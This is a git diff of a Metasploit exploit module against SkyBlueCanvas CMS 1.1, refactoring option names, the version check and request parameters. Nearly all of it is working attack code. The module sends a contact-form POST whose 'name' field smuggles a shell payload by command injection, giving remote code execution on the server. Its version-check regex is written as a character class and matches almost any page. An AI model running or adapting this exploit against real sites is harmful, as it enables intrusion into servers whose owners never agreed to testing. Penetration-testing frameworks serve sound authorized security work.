diff --git a/modules/exploits/multi/http/skybluecanvas_exec.rb b/modules/exploits/multi/http/skybluecanvas_exec.rb index 482afd3571..7bc9062962 100644 --- a/modules/exploits/multi/http/skybluecanvas_exec.rb +++ b/modules/exploits/multi/http/skybluecanvas_exec.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl ruby bash telnet python' } }, - 'Platform' => %w{ linux unix }, + 'Platform' => %w{ unix }, 'Targets' => [ ['SkyBlueCanvas', {}] @@ -49,40 +49,41 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('URI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]), + OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]), ],self.class) end def check - uri = normalize_uri(datastore['URI'], "index.php") + uri = normalize_uri(target_uri.path.to_s, "index.php") res = send_request_raw( { 'uri' => uri - }, 25) + }) - if (res and res.body =~ /[1.1 r248]/) + if res and res.body =~ /[1.1 r248]/ print_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit - uri = normalize_uri(datastore['URI'], "index.php?pid=4") + uri = normalize_uri(target_uri.path.to_s, "index.php") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, + 'vars_get' => { 'pid' => '4' }, 'vars_post' => { - 'cid' => "3", + 'cid' => '3', 'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};", 'email' => rand_text_alphanumeric(10), - "subject" => rand_text_alphanumeric(10), - "message" => rand_text_alphanumeric(10), - "action" => "Send" + 'subject' => rand_text_alphanumeric(10), + 'message' => rand_text_alphanumeric(10), + 'action' => 'Send' } - }, 25) + }) end end